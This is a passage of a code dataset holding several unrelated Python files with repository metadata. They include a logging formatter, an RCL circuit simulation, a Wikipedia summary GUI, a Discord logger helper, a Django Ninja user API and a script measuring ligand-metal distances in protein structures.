**func_kwargs):\n \"\"\"\n Unpacks the {seq}, applying {func} on each element. 
If {seq} is a dict,\n this will only unpack the keys.\n \"\"\"\n if hasattr(seq, '__iter__') and not isinstance(seq, string_types):\n return ', '.join([\n func(element, *func_args, **func_kwargs)\n for element in seq\n ])\n return func(seq, *func_args, **func_kwargs)\n\n @staticmethod\n def __readable_time(seconds):\n \"\"\"\n Formats {seconds} into a human readable string\n \"\"\"\n try:\n seconds = float(seconds)\n except (ValueError, TypeError):\n return seconds\n\n if seconds == 0:\n return '00s'\n\n is_negative = seconds < 0\n seconds = abs(seconds)\n\n time_parts = {}\n def split_time(seconds, UNITS):\n for unit, div in UNITS:\n time_parts[unit] = int(seconds / div)\n if time_parts[unit] > 0:\n seconds -= (time_parts[unit] * div)\n\n # construct human readable string format, skipping parts that are 0\n # '{d}d{h}h{m}m{s}s'\n fmt = [\n '{{{0}:02d}}{0}'.format(u)\n for u, _ in UNITS if time_parts[u] > 0\n ]\n return ''.join(fmt)\n\n fmt = split_time(seconds, Formatter.__LARGE_TIME_UNITS)\n if not fmt:\n fmt = split_time(seconds, Formatter.__SMALL_TIME_UNITS)\n\n if is_negative:\n fmt = '{0}{1}'.format('-', fmt)\n\n return fmt.format(**time_parts)\n\n @staticmethod\n def readable_time(seconds):\n return Formatter.unpack(seconds, Formatter.__readable_time)\n\n @staticmethod\n def __readable_size(size, suffix='B'):\n \"\"\"\n Formats {size} into a human readable string\n \"\"\"\n try:\n size = float(size)\n except (ValueError, TypeError):\n return size\n\n prefix = 'Y'\n for unit in Formatter.__SIZE_UNITS:\n if abs(size) < float(2**10):\n prefix = unit\n break\n size /= float(2**10)\n return '{0:3.2f} {1}{2}'.format(size, prefix, suffix)\n\n @staticmethod\n def readable_size(size, suffix='B'):\n return Formatter.unpack(size, Formatter.__readable_size, suffix=suffix)\n\n @staticmethod\n def yesno(value):\n return 'yes' if bool(value) else 'no'\n\n @staticmethod\n def pprint(thing):\n import pprint\n return pprint.pformat(thing)\n\n @staticmethod\n def __strftime(fmt, **kwargs):\n import time\n\n try:\n # special extra key: {strf_time} to use instead of current time\n time_val = kwargs['strf_time']\n except KeyError:\n # no strf_time key specified\n pass\n else:\n try:\n # try to use the specified time\n return time.strftime(fmt, time_val)\n except TypeError:\n # Tuple or struct_time argument required\n try:\n # try to convert it\n return time.strftime(fmt, time.localtime(time_val))\n except TypeError:\n # bad time_val (not integer/float)\n pass\n\n # everything failed, just return the current time\n return time.strftime(fmt)\n\n @staticmethod\n def strftime(fmt, **kwargs):\n return Formatter.unpack(fmt, Formatter.__strftime, **kwargs)\n\nclass NoColorFormatter(Formatter):\n \"\"\"\n Color-less logging formatter\n \"\"\"\n\n @staticmethod\n def color_msg(msg, *args, **kwargs):\n return msg\n\n @staticmethod\n def get_fg_color_msg(msg, *args, **kwargs):\n return Formatter.unpack(msg)\n\n\n__all__ = [\n 'Formatter',\n 'NoColorFormatter',\n]\n\n", "repo_name": "lv10wizard/ig-highlights-bot", "sub_path": "src/util/logger/formatter.py", "file_name": "formatter.py", "file_ext": "py", "file_size_in_byte": 20149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Formatter", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.getfilesystemencoding", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.INFO", 
"line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.Formatter.__init__", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 68, "usage_type": "attribute"}, {"api_name": "six.iteritems", "line_number": 138, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}, {"api_name": "logging.Formatter.format", "line_number": 188, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 188, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.__REGEXES", "line_number": 195, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.KEYWORD_REGEX_FMT", "line_number": 197, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 199, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback'}.__REGEXES", "line_number": 200, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.__STR_FORMATTER", "line_number": 209, "usage_type": "attribute"}, {"api_name": "string.Formatter", "line_number": 212, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string'}.__STR_FORMATTER", "line_number": 213, "usage_type": "attribute"}, {"api_name": "re.escape", "line_number": 222, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 223, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 228, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 280, "usage_type": "argument"}, {"api_name": "sys.version_info", "line_number": 342, "usage_type": "attribute"}, {"api_name": "six.binary_type", "line_number": 350, "usage_type": "argument"}, {"api_name": "six.string_types", "line_number": 358, "usage_type": "argument"}, {"api_name": "{'traceback': 'traceback', 'string': 'string'}.__encode", "line_number": 361, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__stringify", "line_number": 370, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 374, "usage_type": "call"}, {"api_name": "time.time", "line_number": 376, "usage_type": "call"}, {"api_name": "time.time", "line_number": 385, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_foreground", "line_number": 408, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_foreground", "line_number": 411, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__choose_color", "line_number": 412, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_background", "line_number": 420, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_background", "line_number": 423, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__choose_color", "line_number": 424, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__stringify", "line_number": 434, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 
'random'}.color_msg", "line_number": 444, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.color_fg", "line_number": 444, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 446, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 454, "usage_type": "argument"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__LARGE_TIME_UNITS", "line_number": 492, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__SMALL_TIME_UNITS", "line_number": 494, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 503, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__readable_time", "line_number": 503, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__SIZE_UNITS", "line_number": 516, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 525, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__readable_size", "line_number": 525, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 534, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 549, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 554, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 554, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 560, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.unpack", "line_number": 564, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.__strftime", "line_number": 564, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.unpack", "line_number": 577, "usage_type": "call"}]} +{"seq_id": "13706003513", "text": "import copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport pandas as pd\n\n# Constants\nstart_time = time.time()\nC1 = 10 * 10 ** -3\nC2 = 20 * 10 ** -3\nL_max = 2\nL_min = 0.2\nI_min = 1\nI_max = 2\nR1 = 83\nR2 = 93\nR3 = 80\nUmax = 10\na = 0.004\nT = 2 * a\ndt = T / 400\n\nUc1_old = 1\ni2_old = 1\nUc2_old = 1\nUc1 = 1\ni2 = 1\nUc2 = 1\n\nn = 3\nvals_x = []\nuc1_vals_y = []\nul2_vals_x = []\nul2_vals_y = []\nI2_vals = []\nL2_vals = []\nuc2_vals_y = []\nu1_vals_y = []\nu2_vals_y = []\nt = 0\n\nA = np.array(\n [\n [1, I_min, I_min ** 2, I_min ** 3],\n [1, I_max, I_max ** 2, I_max ** 3],\n [0, 1, 2 * I_min, 3 * I_min ** 2],\n [0, 1, 2 * I_max, 3 * I_max ** 2]\n ])\nb = [L_max, L_min, 0, 0]\n\n\ndef U1(t):\n if t < a:\n return Umax / a * t\n elif a <= t < 2 * a:\n return -Umax / a * t + 10\n elif t == 2 * a:\n return 0\n else:\n return U1(t - T)\n\n\ndef U2():\n return i2 * R3\n\n\ndef _L2(i2):\n if abs(i2) <= I_min:\n return L_max\n if abs(i2) >= I_max:\n return L_min\n a = gauss()\n return a[0] + a[1] * abs(i2) + a[2] * i2 ** 2 + a[3] * abs(i2 ** 3)\n\n\ndef gauss():\n n1 = 4\n B = [L_max, L_min, 0, 0]\n\n x = 0\n v = copy.deepcopy(A)\n p = copy.deepcopy(B)\n y = [0 for _ 
in range(len(A))]\n c = [[0 for _ in range(n1)] for _ in range(n1)]\n\n for k in range(n1):\n # Column sort\n m = v[k][k]\n w = k\n for l in range(k + 1, n1):\n if m < abs(v[l][k]):\n m = abs(v[l][k])\n w = l\n p[k], p[w] = p[w], p[k]\n for d in range(n1):\n v[k][d], v[w][d] = v[w][d], v[k][d]\n\n if v[k][k] != 0:\n y[k] = p[k] / v[k][k]\n else:\n y[k] = p[k]\n for i in range(k + 1, n1):\n p[i] -= v[i][k] * y[k]\n for j in range(k + 1, n1):\n c[k][j] = v[k][j] / v[k][k]\n v[i][j] -= v[i][k] * c[k][j]\n\n x = copy.deepcopy(y)\n for i in range(n1 - 1, -1, -1):\n s = 0\n for j in range(i + 1, n1):\n s += c[i][j] * x[j]\n x[i] = y[i] - s\n return x\n\n\ndef F(t, Uc1, i2, Uc2):\n fun = (U1(t) - Uc2) / C1\n return fun\n\n\ndef G(t, Uc1, i2, Uc2):\n fun = (Uc2 - i2 * (R2 + R3)) / _L2(i2)\n return fun\n\n\ndef H(t, Uc1, i2, Uc2):\n fun = ((U1(t) - Uc2) / C2) - i2\n return fun\n\n\ndef draw(vals_x, vals_y, title, xlabel, ylabel):\n vals_x = np.array(vals_x)\n vals_y = np.array(vals_y)\n plt.title(title, fontdict={'family': 'serif', 'color': 'darkred', 'size': 18})\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.axhline(y=0, color=\"black\")\n plt.axvline(x=0, color=\"black\")\n plt.plot(vals_x, vals_y, 'g')\n plt.show()\n\n\nif __name__ == '__main__':\n while t <= 20 * T:\n K1 = dt * F(t, Uc1_old, i2_old, Uc2_old)\n L1 = dt * G(t, Uc1_old, i2_old, Uc2_old)\n M1 = dt * H(t, Uc1_old, i2_old, Uc2_old)\n K2 = dt * F(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n L2 = dt * G(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n M2 = dt * H(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n K3 = dt * F(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n L3 = dt * G(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n M3 = dt * H(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n Uc1 = Uc1_old + (K1 + 3 * K3) / 4\n i2 = i2_old + (L1 + 3 * L3) / 4\n Uc2 = Uc2_old + (M1 + 3 * M3) / 4\n\n vals_x.append(t)\n uc1_vals_y.append(Uc1)\n uc2_vals_y.append(Uc2)\n ul2_vals_y.append(i2)\n u1_vals_y.append(U1(t))\n u2_vals_y.append(U2())\n Uc1_old = Uc1\n i2_old = i2\n Uc2_old = Uc2\n\n t += dt\n i = 0\n while i <= I_max + 1:\n I2_vals.append(i)\n L2_vals.append(_L2(i))\n i += dt\n\n df = pd.DataFrame({\n \"t\": vals_x,\n \"Вхідна напруга U1\": u1_vals_y,\n \"Вихідна напруга U2\": u2_vals_y,\n \"Напруга на С1\": uc1_vals_y,\n \"Напруга на L2\": ul2_vals_y,\n \"Напруга на С2\": uc2_vals_y,\n \"Час виконання\": (time.time() - start_time)\n })\n np.savetxt(\"result.dat\", df, fmt=\"%f\", header=\" T U1 U2 Uc1 Ul2 Uc2 Runtime\", comments=\"\")\n\n draw(I2_vals, L2_vals, \"L2(i2)\", \"i, А\", \"L, Гн\")\n draw(vals_x, uc1_vals_y, \"UС1\", \"t, сек\", \"U, В\")\n draw(vals_x, ul2_vals_y, \"UL2\", \"t, сек\", \"U, В\")\n draw(vals_x, uc2_vals_y, \"UС2\", \"t, сек\", \"U, В\")\n draw(vals_x, u1_vals_y, \"U1\", \"t, сек\", \"U, В\")\n draw(vals_x, u2_vals_y, \"U2\", \"t, сек\", \"U, В\")\n", "repo_name": "MKruchok/Numerical_methods", "sub_path": "lab6 (complex RCL approximation).py", "file_name": "lab6 (complex RCL approximation).py", "file_ext": "py", "file_size_in_byte": 4893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, 
{"api_name": "copy.deepcopy", "line_number": 81, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "5855604349", "text": "import tkinter\nimport ttkbootstrap as ttk\nimport wikipedia\n\n\nwindow = ttk.Window(themename=\"darkly\")\nwindow.geometry(\"500x500\")\nwindow.title(\"Information Getter.\")\n\nsearch_input = ttk.Entry(window, font=(\"Arial\", 12))\nsearch_input.pack(pady=5)\n\n\ndef change_info():\n try:\n summary = wikipedia.summary(search_input.get(), sentences=2, auto_suggest=False)\n information_box.config(text=summary)\n except wikipedia.exceptions.PageError:\n information_box.config(text=\"Couldn't find info.\")\n except wikipedia.exceptions.DisambiguationError:\n information_box.config(text=\"Please be more specific.\")\n except Exception as e:\n information_box.config(text=f\"An unknown error occurred. 
{e}\")\n\n\nget_info_button = ttk.Button(window, text=\"Get info!\", command=change_info)\nget_info_button.pack(pady=5)\n\ninformation_box = ttk.Label(window, text=\"Enter a class to get information.\", wraplength=470, font=(\"Arial\", 13))\ninformation_box.pack(pady=5)\n\nwikipedia_credit = ttk.Label(window, text=\"Summaries taken from Wikipedia.\", font=(\"Arial\", 10))\nwikipedia_credit.pack()\nwikipedia_credit.place(relx=0.5, rely=0.95, anchor=\"center\")\n\ntkinter.mainloop()\n", "repo_name": "runes121/Quick-Info-Getter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ttkbootstrap.Window", "line_number": 6, "usage_type": "call"}, {"api_name": "ttkbootstrap.Entry", "line_number": 10, "usage_type": "call"}, {"api_name": "wikipedia.summary", "line_number": 16, "usage_type": "call"}, {"api_name": "wikipedia.exceptions", "line_number": 18, "usage_type": "attribute"}, {"api_name": "wikipedia.exceptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "ttkbootstrap.Button", "line_number": 26, "usage_type": "call"}, {"api_name": "ttkbootstrap.Label", "line_number": 29, "usage_type": "call"}, {"api_name": "ttkbootstrap.Label", "line_number": 32, "usage_type": "call"}, {"api_name": "tkinter.mainloop", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "72058239874", "text": "import logging\nimport os\nfrom logging.handlers import RotatingFileHandler\n\nparent_logger = logging.getLogger(\"discord\")\nparent_logger.setLevel(logging.INFO)\nhandler = RotatingFileHandler(\n filename=\"logs/ceres.log\",\n encoding='utf-8',\n mode='a',\n maxBytes=1024000,\n backupCount=5\n)\nhandler.setFormatter(\n logging.Formatter(\n fmt='[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n)\nparent_logger.addHandler(handler)\n\n\ndef get_logger(name):\n \"\"\"\n Takes the name of the file and generates a child logger of the discord logger to be used by the file to log\n events to the discord logger.\n The logging level is determined by the parent logger (the discord logger in this case).\n :param name: Should always be passed via __name__\n :return: a logger object.\n \"\"\"\n\n levels = {\n \"CRITICAL\": logging.CRITICAL,\n \"ERROR\": logging.ERROR,\n \"WARNING\": logging.WARNING,\n \"INFO\": logging.INFO,\n \"DEBUG\": logging.DEBUG,\n \"NOTSET\": logging.NOTSET\n }\n\n logger = logging.getLogger('discord.' 
+ name)\n logger.name = name\n logger.level = levels[os.getenv(\"LOG_LEVEL\", \"INFO\")]\n\n return logger\n", "repo_name": "colcrunch/ceres", "sub_path": "utils/loggers.py", "file_name": "loggers.py", "file_ext": "py", "file_size_in_byte": 1233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.NOTSET", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "496661609", "text": "from ninja import Router\n\nfrom subscription.models import UserSubscription, Subscription\nfrom . import schema\nfrom user.models import User\n\n\nuser_router = Router(tags=[\"사용자 API\"])\n\n# 유저 정보 가져오기\n@user_router.get(\n '/like/',\n response={200: schema.UserLikeSchema},\n summary=\"사용자 좋아요 목록\",\n)\ndef get_user(request):\n '''\n 사용자 좋아요 목록입니다.\n\n 데이터는 like_list에 담겨 있습니다.\n '''\n\n user_subscriptions = UserSubscription.objects.filter(user_id=request.auth.id)\n\n like_list = []\n\n if len(user_subscriptions) != 0:\n for user_subscription in user_subscriptions:\n subscription = Subscription.objects.get(id=user_subscription.user_subscription_id)\n like_num = len(UserSubscription.objects.filter(user_subscription_id=subscription.id))\n subscription.like_num = like_num\n like_list.append(subscription)\n\n return 200, {'like_list':like_list}\n\n# 사용자 정보 수정\n@user_router.patch(\n '/',\n response={201: None},\n summary='사용자 정보 수정'\n)\ndef edit_user(request, data: schema.UserSchema):\n '''\n 사용자 정부 수정 API입니다.\n\n first_name: str -> 사용자 이름\n last_name: str -> 사용자 성\n email: str -> 사용자 이메일\n\n 데이터 정규식 체크해서 보내주시기 바랍니다.\n 데이터 값이 바뀌지 않을 경우 원본 데이터를 넣어서 보내주시기 바랍니다.\n '''\n user_email = data.email\n user_first_name = data.first_name\n user_last_name = data.last_name\n\n user_info = User.objects.get(id=request.auth.id)\n\n user_info.email = user_email\n user_info.first_name = user_first_name\n user_info.last_name = user_last_name\n user_info.save()\n\n return 201\n", "repo_name": "subscriptionRescueTeam/save-my-youth", "sub_path": "backend/user/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ninja.Router", "line_number": 8, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "subscription.models.UserSubscription", "line_number": 23, "usage_type": "name"}, {"api_name": "subscription.models", "line_number": 29, "usage_type": "name"}, 
{"api_name": "subscription.models.Subscription.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "subscription.models.Subscription.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "subscription.models.Subscription", "line_number": 29, "usage_type": "name"}, {"api_name": "subscription.models.UserSubscription.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subscription.models.UserSubscription", "line_number": 30, "usage_type": "name"}, {"api_name": "subscription.models.id", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subscription.models", "line_number": 30, "usage_type": "name"}, {"api_name": "subscription.models.like_num", "line_number": 31, "usage_type": "attribute"}, {"api_name": "subscription.models", "line_number": 31, "usage_type": "name"}, {"api_name": "subscription.models", "line_number": 32, "usage_type": "argument"}, {"api_name": "user.models.User.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "1534323855", "text": "'''\nGet the hasMetals dataset.\n\nUsage: getHasMetals.py \n\nExample 1: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsMg.txt MG globalData/structFiles_adp_07-22-22\n\nExample 2: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsTopSix.txt ZN,MG,CA,FE,NA,MN globalData/structFiles_adp_07-22-22\n\nExample 3: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsAll.txt ZN,MG,CA,FE,NA,MN,K,CU,NI,CO,CD,HG,PT,MO,AL,V,BA,SR,RU,CS,W,YB,AU,Y,LI,PB,GD,TL,RB,SM,IR,PR,RH,EU,PD,AG,OS,LU,HO,TB,CR,GA,LA,SB,CE,ER,IN,BI,DY,BE,ZR,SN,HF,TA,RE,PA,U globalData/structFiles_adp_07-22-22\n'''\n\n\nimport sys\nimport Bio.PDB as bioPDB\nimport numpy as np\nimport json\nimport os\n\n\n# pdbFolderPath = 'globalData/structFiles_01-04-22/'\n\n\ndef main(pdbIDFilePath: str, discrepDirPath: str, ligandName:str, resultFilePath: str, metalNameList: list, structFileDirPath:str) -> None:\n \"\"\"\n :param pdbIDFilePath: path to text file of PDB IDs\n :param discrepDirPath: path to directory of discrepancy data\n :param ligandName: name of the ligand to search for\n :param resultFilePath: path to the text file in which to record the final dataset\n :param metalNameList: list of metals to collect\n :param structFileDirPath: path to the directory containing the struct files for the ligand dataset\n \"\"\"\n # print('entered main')\n discrepDict = getDiscrepDict(discrepDirPath)\n # print('got discrepDict')\n \n discrepDict = getMetalDists(discrepDict, metalNameList, ligandName, pdbIDFilePath, structFileDirPath)\n # print('got metal dists')\n\n resultList = []\n for ((pdbID, _, _, _, _), residueDict) in discrepDict.items():\n absDiscrep = residueDict['num_electrons_actual_abs_significant_regional_discrepancy']\n nonabsDiscrep = residueDict['num_electrons_actual_significant_regional_discrepancy']\n\n # print('got discreps')\n if 'metalDist' in residueDict.keys():\n # print('has metalDist')\n metalDist = residueDict['metalDist']\n\n # NOTE: strictly for debugging\n 
assert(metalDist < sys.maxsize)\n\n finalData = ','.join(str(val) for val in [pdbID, absDiscrep, nonabsDiscrep, metalDist])\n\n resultList.append(finalData)\n \n # print('resultList len', len(resultList))\n with open(resultFilePath, 'w') as resultFile, \\\n open(pdbIDFilePath, 'r') as pdbIDFile:\n resultFile.write('\\n'.join(resultList))\n\n # NOTE: The following lines in this with block are just a sanity check.\n print('num of residues:', len(resultList))\n numEntries = len([entryName for entryName in pdbIDFile])\n print('num of entries:', numEntries)\n\n print('Finished running!')\n\n\ndef getInitDist(metalList, atomList):\n '''\n Get the initial metal distance to use as the initial value for minDist in getResDictList.\n\n :param metalList: list of metals\n :param atomList: list of atoms\n '''\n for metal in metalList:\n distList = [np.linalg.norm(atom.coord - metal.coord) for atom in atomList if not np.array_equal(atom.coord, metal.coord)]\n\n if(len(distList) > 0):\n return np.min(distList)\n return sys.maxsize\n\n\ndef getMetalDists(discrepDict:dict, metalNameList: list, ligandName:str, pdbIDFilePath: str, structFileDirPath:str) -> dict:\n '''\n Add metal contact distances to the residues in discrepDict.\n\n :param discrepDict: dictionary of residues paired with basic info about them along with discrepancy data\n :param metalNameList: list of names of metals\n :param ligandName: name of the ligand to search for\n :param pdbIDFilePath: path to the file containing the list of PDB IDs\n :param structFileDirPath: path to the directory containing the struct files for the ligand dataset\n '''\n\n with open(pdbIDFilePath, 'r') as pdbIDFile:\n pdbIDList = [line.rstrip('\\n') for line in pdbIDFile]\n for pdbid in pdbIDList:\n pdbID = pdbid.lower()\n structFilePath = structFileDirPath + 'pdb' + pdbID + '.ent'\n\n if os.path.isfile(structFilePath):\n parser = bioPDB.PDBParser(QUIET=True)\n bioPDBObj = parser.get_structure(pdbID, structFilePath)\n \n atomList = list(bioPDBObj.get_atoms())\n metalList = [atom for atom in atomList if atom.element in metalNameList]\n resList = list(bioPDBObj.get_residues())\n ligandResList = [res for res in resList if res.resname == ligandName]\n\n # print('ligand name', ligandName)\n # print('ligandResList len', len(ligandResList))\n\n for res in ligandResList:\n resID = (pdbID, res.parent.parent.id, res.parent.id, res.resname, res.id[1])\n # print('modelID type', type(res.parent.parent.id))\n\n if resID in discrepDict.keys():\n # print('has resID')\n ligandAtomList = list(res.get_atoms())\n\n # # NOTE: This is just an initial value for minDist.\n # minDist = getInitDist(metalList, ligandAtomList)\n\n distList = [np.linalg.norm(atom.coord - metal.coord) for atom in ligandAtomList for metal in metalList if not np.array_equal(atom.coord, metal.coord)]\n\n minDist = np.min(distList) if len(distList) > 0 else sys.maxsize\n\n # If there is a minimum distance\n if minDist < sys.maxsize:\n # print('has metalDist')\n discrepDict[resID]['metalDist'] = minDist\n \n else:\n print('no struct file for ' + pdbID)\n \n return discrepDict\n\n\ndef getDiscrepDict(discrepDirPath: str) -> dict:\n '''\n Return the discrepancy data referenced at discrepDirPath as a dictionary of residue dictionaries.\n\n :param discrepDirPath: path to the directory containing the discrepancy data\n '''\n discrepDict = dict()\n with os.scandir(discrepDirPath) as discrepDir:\n for dirEntry in discrepDir:\n with open(dirEntry, 'r') as discrepFile:\n # Recall that each discrepFile represents the 
